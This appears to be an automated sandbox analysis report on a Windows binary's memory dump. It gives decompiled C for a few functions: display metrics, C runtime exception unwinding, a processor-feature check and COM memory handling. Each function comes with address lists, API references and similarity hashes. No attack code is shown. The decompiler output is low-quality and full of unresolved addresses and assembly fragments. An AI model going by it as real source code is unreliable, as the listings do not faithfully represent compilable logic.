0x0040eb38
0x0040eb3b
0x0040eb43
0x0040eb44
0x0040eb45
0x0040eb46
0x0040eb4d
0x0040eb50
0x0040eb54
0x0040eb63
0x0040eb68
0x0040eb6b
0x00000000
0x0040eb6b
0x0040eb0d
0x00000000

APIs

SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0040EB1C
GetSystemMetrics.USER32 ref: 0040EB34
GetSystemMetrics.USER32 ref: 0040EB3B

Strings

DISPLAY, xrefs: 0040EB58

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: System$Metrics$InfoParameters
String ID: DISPLAY
API String ID: 3136151823-865373369
Opcode ID: bafc51d8d70406bb2a410c72ca7409d9f45882c2e2d67789fbf29fbd24cf31fe
Instruction ID: 1749a497c6d48bc896e633c6973daa4b12970a5ec15f7fa29fbadcc6c66833b7
Opcode Fuzzy Hash: bafc51d8d70406bb2a410c72ca7409d9f45882c2e2d67789fbf29fbd24cf31fe
Instruction Fuzzy Hash: 32119871E00324EBCB11DF65AC8196B7BB8EF05740F004877FD06BA185D678E851CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00430409, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00430409(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00430378(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00426E4A(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E0042FDFC(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E0043005D(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t26, _t27, _t31);
				if(_t20 != 0) {
					E00426E13(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x00430409
0x00430409
0x00430409
0x00430409
0x00430409
0x0043040c
0x00430410
0x00430412
0x00430415
0x00430416
0x00430417
0x0043041a
0x0043041f
0x0043041f
0x00430422
0x00430426
0x00430429
0x0043042e
0x0043042b
0x0043042b
0x0043042b
0x00430431
0x00430436
0x00430438
0x0043043b
0x0043043e
0x0043043f
0x00430447
0x0043044c
0x00430450
0x00430453
0x00430456
0x0043045c
0x0043045d
0x00430460
0x0043046a
0x0043046e
0x00000000
0x0043046e
0x00430474

APIs

___BuildCatchObject.LIBCMT ref: 0043041A

Part of subcall function 00430378: ___BuildCatchObjectHelper.LIBCMT ref: 004303AE
Part of subcall function 00430378: ___AdjustPointer.LIBCMT ref: 004303C5

_UnwindNestedFrames.LIBCMT ref: 00430431
___FrameUnwindToState.LIBCMT ref: 0043043F

Strings

csm, xrefs: 00430416, 0043042B, 0043043E, 0043045C, 0043046C

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: BuildCatchObjectUnwind$AdjustFrameFramesHelperNestedPointerState
String ID: csm
API String ID: 11809540-1018135373
Opcode ID: 12b618ea4a70c52241f7466c20c28dec541d9009826b2c8d0cff5cc33c44e3b3
Instruction ID: 4fe56a9b1f0f482a496b4d253052508cc73fff5c5bec5154ca26ec676378ebb6
Opcode Fuzzy Hash: 12b618ea4a70c52241f7466c20c28dec541d9009826b2c8d0cff5cc33c44e3b3
Instruction Fuzzy Hash: 36014231100119BBCF126F52DC41EAB3F6AEF18358F40811AFE1815221D73A9AB1EBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00433366, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00433366() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x440c40;
					_v28 =  *0x440c38;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x0043336b
0x00433373
0x0043338a
0x00433336
0x0043333f
0x0043334b
0x0043334e
0x00433351
0x00433353
0x00433356
0x0043335b
0x00433365
0x0043335d
0x00433361
0x00433361
0x00433375
0x0043337b
0x00433383
0x00000000
0x00433385
0x00433385
0x00433389
0x00433389
0x00433383

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0042A43A), ref: 0043336B
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0043337B

Strings

KERNEL32, xrefs: 00433366
IsProcessorFeaturePresent, xrefs: 00433375

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 1ff3b7368d621a2865122e4cead488d0c3c4ee1a71562b8811248afa1dc60543
Instruction ID: 319c169067377543713bffa939f6980dde61baca6c2278a05582f2168807bcb1
Opcode Fuzzy Hash: 1ff3b7368d621a2865122e4cead488d0c3c4ee1a71562b8811248afa1dc60543
Instruction Fuzzy Hash: 9FC08C60B80300A2EB541FB07C4AF1B22083B1CB03F14BA6ABC0AD40D4DE6DC224982D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D9D2, Relevance: 6.3, APIs: 4, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0041D9D2(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				char _v168;
				char _v176;
				char _v184;
				signed int* __ebp;
				signed int _t131;
				signed int _t137;
				signed int _t138;
				void* _t139;
				intOrPtr* _t144;
				intOrPtr* _t147;
				signed int _t148;
				signed int _t150;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t157;
				signed int _t162;
				intOrPtr _t163;
				intOrPtr* _t165;
				intOrPtr* _t167;
				intOrPtr* _t175;
				intOrPtr _t177;
				signed int _t178;
				signed int _t180;
				signed int* _t181;
				void* _t182;
				intOrPtr* _t183;
				signed int _t197;
				signed int _t199;
				intOrPtr _t214;
				intOrPtr* _t216;
				intOrPtr _t217;
				signed int _t219;
				void* _t222;
				void* _t223;
				void* _t225;
				void* _t226;

				_t183 = __ecx;
				_t226 = _t225 - 0x74;
				_t219 =  &_v124;
				_t131 =  *0x44f5d0; // 0x765b253d
				_a116 = _t131 ^ _t219;
				_push(0x1c);
				E004271DA(E0043AF42, __ebx, __edi, __esi);
				_t216 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t137 =  *(__ecx + 8);
					__eflags = _t137;
					if(_t137 != 0) {
						_t209 =  &_a12;
						_t138 =  *((intOrPtr*)( *_t137 + 0xc))(_t137, 0x441da4,  &_a12,  &_a8);
						__eflags = _t138;
						if(_t138 >= 0) {
							E0041A3B7( &_a12,  &_a20, 0x4424c0);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E0041A3B7( &_a12,  &_a68, 0x4424a8);
							_t144 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t209 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t178 =  *((intOrPtr*)( *_t144 + 0x10))(_t144, 2,  &_a20, 0x28, 0);
							__eflags = _t178;
							if(_t178 >= 0) {
								_t209 = 0;
								_v40 = _a8;
								_t147 = _a12;
								__eflags = 0;
								_v36 = 1;
								 *_t147 =  *_t147 + _t147;
								 *_t147 =  *_t147 + _t147;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t148 =  *((intOrPtr*)( *_t147 + 0x18))(_t147, 0, 0,  &_v40);
								__eflags = _t148;
								 *_t219 = _t148;
								if(_t148 >= 0) {
									 *((intOrPtr*)(_t216 + 0x14)) = _v32;
									_t150 = _v20;
									_a8 = _t150;
									 *(_t216 + 0x10) = _t150;
									_t151 = _a12;
									 *((intOrPtr*)(_t216 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t151 + 8))(_t151);
									goto L32;
								} else {
									_t165 = _a12;
									 *((intOrPtr*)( *_t165 + 8))(_t165);
								}
								goto L50;
							} else {
								_t167 = _a12;
								 *((intOrPtr*)( *_t167 + 8))(_t167);
								_t138 = _t178;
							}
						}
					} else {
						_t138 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x441fa4, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t214);
						_pop(_t217);
						_pop(_t177);
						_t139 = E0042569C(_t138, _t177, _a116 ^ _t219, _t209, _t214, _t217);
						__eflags =  &_a120;
						return _t139;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x441f84);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x4420c4);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E0040A3C7(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E0041D225(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E0041A5E0(__ecx, __eax);
						}
						__eax = E0040A3C7(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E00419240(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						_push( *( *(__esi + 0x50)));
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E004277B0(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E0041D247( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E0041A59D(__ecx);
								L32:
								__eflags =  *(_t216 + 0x10);
								_a16 = 0;
								if( *(_t216 + 0x10) > 0) {
									_t182 = 0;
									__eflags = 0;
									do {
										_t162 = E0040A3C7(__eflags, 0x1c);
										_a8 = _t162;
										__eflags = _t162;
										_v4 = 0;
										if(_t162 == 0) {
											_t163 = 0;
											__eflags = 0;
										} else {
											_t163 = E004219E1(_t162, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t182 +  *((intOrPtr*)(_t216 + 0x14)) + 0x24)) = _t163;
										_t182 = _t182 + 0x28;
										__eflags = _a16 -  *(_t216 + 0x10);
									} while (__eflags < 0);
								}
								_t180 = _v16;
								__eflags = _t180;
								if(_t180 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t153 = 0xffffffdc;
										_t181 = _t180 + 0x24;
										_a16 = _a4;
										_a8 = _t153 - _v16;
										while(1) {
											_t197 =  *( *_t181 + 4);
											__eflags = _t197;
											_a4 = _t197;
											if(_t197 == 0) {
												goto L46;
											}
											while(1) {
												_t157 = E0040B523( &_a4);
												_t209 =  *_t216;
												 *((intOrPtr*)( *_t216 + 8))( *_t157, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E00421909( *_t181);
											_t199 =  *_t181;
											__eflags = _t199;
											if(_t199 != 0) {
												 *((intOrPtr*)( *_t199 + 4))(1);
											}
											_t181 =  &(_t181[0xa]);
											_t126 =  &_a16;
											 *_t126 = _a16 - 1;
											__eflags =  *_t126;
											if( *_t126 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t138 =  *_t219;
								goto L51;
							} else {
								_push(_t219);
								_t222 = _t226;
								_push(_t183);
								_v168 = 0x44e8a0;
								E00429326( &_v168, 0x448908);
								asm("int3");
								_push(_t222);
								_t223 = _t226;
								_push(_t183);
								_v176 = 0x44e938;
								E00429326( &_v176, 0x44894c);
								asm("int3");
								_push(_t223);
								_push(_t183);
								_t12 =  &_v184; // 0x44e938
								_v184 = 0x44e9d0;
								E00429326(_t12, 0x448990);
								asm("int3");
								_t175 = _t183;
								 *((intOrPtr*)(_t175 + 4)) = 1;
								return _t175;
							}
						} else {
							__eax = 0x8007000e;
							goto L51;
						}
					}
				}
			}

0x0041d9d2
0x0041d9d3
0x0041d9d6
0x0041d9da
0x0041d9e1
0x0041d9e4
0x0041d9eb
0x0041d9f0
0x0041d9f5
0x0041da00
0x0041da03
0x0041db48
0x0041db4b
0x0041db4d
0x0041db5c
0x0041db66
0x0041db69
0x0041db6b
0x0041db7c
0x0041db81
0x0041db90
0x0041db93
0x0041db96
0x0041db9d
0x0041dba0
0x0041dba7
0x0041dbac
0x0041dbaf
0x0041dbb6
0x0041dbbc
0x0041dbc3
0x0041dbc6
0x0041dbcd
0x0041dbd0
0x0041dbdd
0x0041dbdf
0x0041dbe1
0x0041dbfa
0x0041dbfd
0x0041dc00
0x0041dc03
0x0041dc06
0x0041dc09
0x0041dc0b
0x0041dc0d
0x0041dc10
0x0041dc13
0x0041dc19
0x0041dc1c
0x0041dc1e
0x0041dc21
0x0041dc37
0x0041dc3a
0x0041dc3d
0x0041dc40
0x0041dc43
0x0041dc46
0x0041dc4c
0x00000000
0x0041dc23
0x0041dc23
0x0041dc29
0x0041dc29
0x00000000
0x0041dbe3
0x0041dbe3
0x0041dbe9
0x0041dbec
0x0041dbec
0x0041dbe1
0x0041db4f
0x0041db4f
0x0041db4f
0x00000000
0x0041da09
0x0041da09
0x0041da0c
0x0041da0e
0x0041da18
0x0041da1b
0x0041da1d
0x0041da20
0x0041dd10
0x0041dd13
0x0041dd1b
0x0041dd1c
0x0041dd1d
0x0041dd23
0x0041dd28
0x0041dd2c
0x0041da26
0x0041da26
0x0041da29
0x0041da2b
0x0041da2e
0x0041da2f
0x0041da34
0x0041da37
0x0041da39
0x0041da3b
0x0041da3e
0x0041da41
0x0041da42
0x0041da47
0x0041da4a
0x0041da4c
0x0041da50
0x0041da52
0x0041da54
0x0041da57
0x0041da59
0x0041da5d
0x0041da60
0x0041da60
0x0041da68
0x0041da6b
0x0041da6e
0x0041da71
0x0041da71
0x0041da74
0x0041da77
0x0041da7a
0x0041da7a
0x0041da7f
0x0041da84
0x0041da87
0x0041da95
0x0041da95
0x0041da89
0x0041da8c
0x0041da8e
0x0041da8e
0x0041da97
0x0041da9a
0x0041da9d
0x0041daa0
0x0041daa3
0x0041daa6
0x0041daa8
0x0041daaa
0x0041daac
0x0041dab1
0x0041dab1
0x0041dab8
0x0041dabd
0x0041dac0
0x0041dad1
0x0041dad1
0x0041dac2
0x0041dac8
0x0041daca
0x0041daca
0x0041dad3
0x0041dad6
0x0041dad9
0x0041dadb
0x0041dae2
0x0041dae5
0x0041dae8
0x0041daeb
0x0041daee
0x0041daf1
0x0041daf6
0x0041daf9
0x0041db05
0x0041db09
0x0041db0f
0x0041db11
0x0041db13
0x0041db16
0x0041db1b
0x0041db25
0x0041db2b
0x0041db30
0x0041db36
0x0041db3b
0x0041db3e
0x0041dc4f
0x0041dc4f
0x0041dc52
0x0041dc55
0x0041dc57
0x0041dc57
0x0041dc59
0x0041dc5b
0x0041dc61
0x0041dc64
0x0041dc66
0x0041dc69
0x0041dc76
0x0041dc76
0x0041dc6b
0x0041dc6f
0x0041dc6f
0x0041dc78
0x0041dc7f
0x0041dc82
0x0041dc89
0x0041dc8c
0x0041dc8c
0x0041dc59
0x0041dc91
0x0041dc94
0x0041dc96
0x0041dc98
0x0041dc9b
0x0041dca2
0x0041dca3
0x0041dca9
0x0041dcac
0x0041dcb4
0x0041dcb6
0x0041dcb9
0x0041dcbb
0x0041dcbe
0x00000000
0x00000000
0x0041dcc5
0x0041dcd2
0x0041dcd9
0x0041dce0
0x0041dce3
0x0041dce6
0x00000000
0x00000000
0x0041dcc2
0x0041dce8
0x0041dcea
0x0041dcef
0x0041dcf1
0x0041dcf3
0x0041dcf9
0x0041dcf9
0x0041dcfc
0x0041dcff
0x0041dcff
0x0041dcff
0x0041dd02
0x00000000
0x0041dcb1
0x00000000
0x0041dd02
0x0041dcb4
0x0041dd04
0x0041dd07
0x0041dd07
0x0041dd0d
0x0041dd0d
0x00000000
0x0041db1d
0x00415804
0x00415805
0x00415807
0x00415811
0x00415818
0x0041581d
0x0041581e
0x0041581f
0x00415821
0x0041582b
0x00415832
0x00415837
0x00415838
0x0041583b
0x00415841
0x00415845
0x0041584c
0x00415851
0x00415852
0x00415854
0x0041585b
0x0041585b
0x0041dafb
0x0041dafb
0x00000000
0x0041dafb
0x0041daf9
0x0041da20

APIs

__EH_prolog3.LIBCMT ref: 0041D9EB
CoTaskMemAlloc.OLE32(?,?), ref: 0041DB09
_memset.LIBCMT ref: 0041DB2B
CoTaskMemFree.OLE32(?), ref: 0041DD07

Part of subcall function 0040A3C7: _malloc.LIBCMT ref: 0040A3E1

Memory Dump Source

Source File: 00000000.00000002.199522288.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199518187.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199590313.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199602330.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.199607316.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199611044.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199614967.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199635499.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: d03386db9c22298eaa345dfbf5ca5f7ac9fe6aefe3f0d7d013accdf3c40788ac
Instruction ID: 05ee87ef6d0b8302c145909e946f356ee315b2d4d95d17fb97b268ba1a75f48f
Opcode Fuzzy Hash: d03386db9c22298eaa345dfbf5ca5f7ac9fe6aefe3f0d7d013accdf3c40788ac
Instruction Fuzzy Hash: AFC11BB0A00709AFCB14DF65C885AAAB7F5FF88304B14891EF816CB390D778E985CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041E87E, Relevance: 6.2, APIs: 4, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0041E87E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t83;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr* _t86;
				intOrPtr _t101;
				intOrPtr* _t121;
				intOrPtr* _t122;
				intOrPtr* _t124;
				intOrPtr* _t126;
				intOrPtr* _t128;
				intOrPtr* _t130;
				intOrPtr* _t145;
				intOrPtr* _t151;
				intOrPtr* _t159;
				intOrPtr _t160;
				intOrPtr _t161;
				void* _t162;
				void* _t163;
				intOrPtr _t165;
				intOrPtr* _t166;
				void* _t167;
				intOrPtr _t179;

				_push(0x10);
				E004271DA(E0043B021, __ebx, __edi, __esi);
				_t165 = __ecx;
				 *((intOrPtr*)(_t167 - 0x1c)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43f3b4;
				 *(_t167 - 4) = 0;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					L11:
					while( *((intOrPtr*)(_t165 + 0x24)) != 0) {
						_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x1c)) + 8));
						__eflags = _t159;
						if(_t159 == 0) {
							break;
						}
						_t151 =  *_t159;
						__eflags = _t151;
						if(_t151 == 0) {
							break;
						}
						 *((intOrPtr*)( *_t151 + 0xbc))( *((intOrPtr*)(_t159 + 8)), 0);
						 *((intOrPtr*)( *_t159 + 0x98)) = 0;
					}
					 *((intOrPtr*)(_t167 - 0x18)) = _t165 + 0x18;
					E00421909(_t165 + 0x18);
					if( *((intOrPtr*)(_t165 + 0x40)) == 0) {
						L19:
						_t83 =  *((intOrPtr*)(_t165 + 8));
						if(_t83 != 0) {
							 *((intOrPtr*)( *_t83 + 8))(_t83);
						}
						_t84 =  *((intOrPtr*)(_t165 + 0xc));
						if(_t84 != 0) {
							 *((intOrPtr*)( *_t84 + 8))(_t84);
						}
						if( *((intOrPtr*)(_t165 + 0x14)) == 0) {
							L32:
							_t85 =  *((intOrPtr*)(_t165 + 0x34));
							if(_t85 != 0) {
								__imp__CoTaskMemFree(_t85);
							}
							_t136 =  *((intOrPtr*)(_t165 + 0x54));
							if( *((intOrPtr*)(_t165 + 0x54)) != 0) {
								E0041D292(_t136,  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x50)))));
								E00419269( *((intOrPtr*)(_t165 + 0x54)));
							}
							_t160 =  *((intOrPtr*)(_t165 + 0x54));
							_t191 = _t160;
							if(_t160 != 0) {
								E00419269(_t160);
								_push(_t160);
								E0040A3F2(0, _t157, _t160, _t165, _t191);
							}
							_t161 =  *((intOrPtr*)(_t165 + 0x50));
							_t192 = _t161;
							if(_t161 != 0) {
								E0041E65D(_t161, _t192);
								_push(_t161);
								E0040A3F2(0, _t157, _t161, _t165, _t192);
							}
							_t86 =  *((intOrPtr*)(_t165 + 0x4c));
							if(_t86 != 0) {
								 *((intOrPtr*)( *_t86 + 8))(_t86);
							}
							_t166 =  *((intOrPtr*)(_t165 + 0x48));
							if(_t166 != 0) {
								 *((intOrPtr*)( *_t166 + 8))(_t166);
							}
							 *(_t167 - 4) =  *(_t167 - 4) | 0xffffffff;
							return E004272B2(E00421A04( *((intOrPtr*)(_t167 - 0x18))));
						} else {
							 *((intOrPtr*)(_t167 - 0x10)) = 0;
							if( *((intOrPtr*)(_t165 + 0x10)) <= 0) {
								L31:
								__imp__CoTaskMemFree( *((intOrPtr*)(_t165 + 0x14)));
								goto L32;
							}
							_t162 = 0;
							do {
								_t101 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24)) + 4));
								 *((intOrPtr*)(_t167 - 0x14)) = _t101;
								if(_t101 == 0) {
									goto L28;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((intOrPtr*)( *((intOrPtr*)(E0040B523(_t167 - 0x14))) + 0x98)) = 0;
								} while ( *((intOrPtr*)(_t167 - 0x14)) != 0);
								L28:
								E00421909( *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24)));
								_t145 =  *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x14)) + _t162 + 0x24));
								if(_t145 != 0) {
									 *((intOrPtr*)( *_t145 + 4))(1);
								}
								 *((intOrPtr*)(_t167 - 0x10)) =  *((intOrPtr*)(_t167 - 0x10)) + 1;
								_t162 = _t162 + 0x28;
							} while ( *((intOrPtr*)(_t167 - 0x10)) <  *((intOrPtr*)(_t165 + 0x10)));
							goto L31;
						}
					}
					_t163 = 0;
					if( *((intOrPtr*)(_t165 + 0x38)) <= 0) {
						L17:
						if(_t179 != 0) {
							_push( *((intOrPtr*)(_t165 + 0x3c)));
							E0040A3F2(0, _t157, _t163, _t165, _t179);
							_push( *((intOrPtr*)(_t165 + 0x40)));
							E0040A3F2(0, _t157, _t163, _t165, _t179);
						}
						goto L19;
					}
					 *((intOrPtr*)(_t167 - 0x10)) = 0;
					do {
						__imp__#9( *((intOrPtr*)(_t165 + 0x40)) +  *((intOrPtr*)(_t167 - 0x10)));
						 *((intOrPtr*)(_t167 - 0x10)) =  *((intOrPtr*)(_t167 - 0x10)) + 0x10;
						_t163 = _t163 + 1;
					} while (_t163 <  *((intOrPtr*)(_t165 + 0x38)));
					_t179 =  *((intOrPtr*)(_t165 + 0x38));
					goto L17;
				}
				_t121 =  *((intOrPtr*)(__ecx + 0x50));
				if(_t121 == 0) {
					goto L11;
				}
				_t122 =  *_t121;
				_t157 = _t167 - 0x14;
				_push(_t167 - 0x14);
				_push(0x441f84);
				_push(_t122);
				if( *((intOrPtr*)( *_t122))() < 0) {
					goto L11;
				}
				_t124 =  *((intOrPtr*)(_t167 - 0x14));
				if(_t124 == 0) {
					goto L11;
				}
				_t157 = _t167 - 0x10;
				_push(_t167 - 0x10);
				_push(0x4420c4);
				 *((intOrPtr*)(_t167 - 0x10)) = 0;
				_push(_t124);
				if( *((intOrPtr*)( *_t124 + 0x10))() >= 0) {
					_t128 =  *((intOrPtr*)(_t167 - 0x10));
					if(_t128 != 0) {
						 *((intOrPtr*)( *_t128 + 0x18))(_t128,  *((intOrPtr*)(__ecx + 0x58)));
						_t130 =  *((intOrPtr*)(_t167 - 0x10));
						 *((intOrPtr*)( *_t130 + 8))(_t130);
					}
				}
				_t126 =  *((intOrPtr*)(_t167 - 0x14));
				 *((intOrPtr*)( *_t126 + 8))(_t126);
				goto L11;
			}

0x0041e87e
